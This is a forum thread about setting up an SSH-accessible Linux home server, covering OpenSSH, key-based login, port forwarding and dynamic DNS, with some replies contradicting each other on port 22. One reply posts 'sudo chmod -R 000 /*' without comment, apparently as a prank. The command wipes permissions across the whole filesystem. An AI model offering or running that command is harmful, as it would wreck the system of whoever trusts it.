Trying to set up a Linux home server so I can ssh from somewhere else

I'm trying to set up a Linux home server so I can ssh from somewhere else. 
I have good knowledge in using Linux and networking, but not much about setting up servers.

Is there any video I can watch that might help me? Or someone is willing to walk me through some steps

Package 📦 usually called OpenSSH.

It's usually installed on server OS

Command is usually like this

ssh User@127.0.0.1 

If your linux name is same as server then

ssh 127.0.0.1

Should work.

I'd suggest to make generate public key and private key for easier login without password 🔑 

Can't remember from my head but it should be easy to google.

I'm jank tinkerer if it works then it works.

Regardless of compatibility 🐧🖖

ssh uses port 22 by default but when you're port forwarding you should use something else, botnets will try to force port 22 expecting an ssh server to be exposed there. as mentioned by @BoomerDutch you should use private keys and disable password access for greater security.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Remember to open port 22 in firewall. This is the most common mistakes that cause new users to say "not working".

Sudo make me a sandwich 

3 hours ago, harris006 said:

for generating public and private key use puttygen

Yes that's easier way.

Although I'm doing the old way.

Both works.

I'm jank tinkerer if it works then it works.

Regardless of compatibility 🐧🖖

On 2/19/2024 at 8:20 PM, OceanC said:

I'm trying to set up a Linux home server so I can ssh from somewhere else. 
I have good knowledge in using Linux and networking, but not much about setting up servers.

Is there any video I can watch that might help me? Or someone is willing to walk me through some steps

If you're intending to access a home server from outside your home network, you're probably going to run into an IP issue. Residential internet generally doesn't come with a static IP, you'll need to talk to your ISP to get one or you need to set up some form of dynamic dns. Otherwise, you're going to run into the problem of your outward facing IP changing every couple days.

On 2/22/2024 at 11:26 PM, masked said:

If you're intending to access a home server from outside your home network, you're probably going to run into an IP issue. Residential internet generally doesn't come with a static IP, you'll need to talk to your ISP to get one or you need to set up some form of dynamic dns. Otherwise, you're going to run into the problem of your outward facing IP changing every couple days.

This is not really an issue. Ip is tie to a router if you are like most people who use one. Ip address rarely changes. I have the same public ip for months. 

There is free dns too like noip. I have a tutorial for it. 

Sudo make me a sandwich 

On 2/24/2024 at 1:01 PM, wasab said:

This is not really an issue. Ip is tie to a router if you are like most people who use one. Ip address rarely changes. I have the same public ip for months. 

There is free dns too like noip. I have a tutorial for it. 

Interesting. I have "fond" memories of my public IP changing three times in a week when I experimented with a home server but that was a number of years ago. Maybe things have changed. NOIP should solve the issue though. It's not an insurmountable hurdle if it comes up, I just found it moderately annoying when I first looked at setting up a home server.

@harris006

You need to allow and port forward port 22 instead of 443 and 80 if you wish to ssh from anywhere btw. 

Sudo make me a sandwich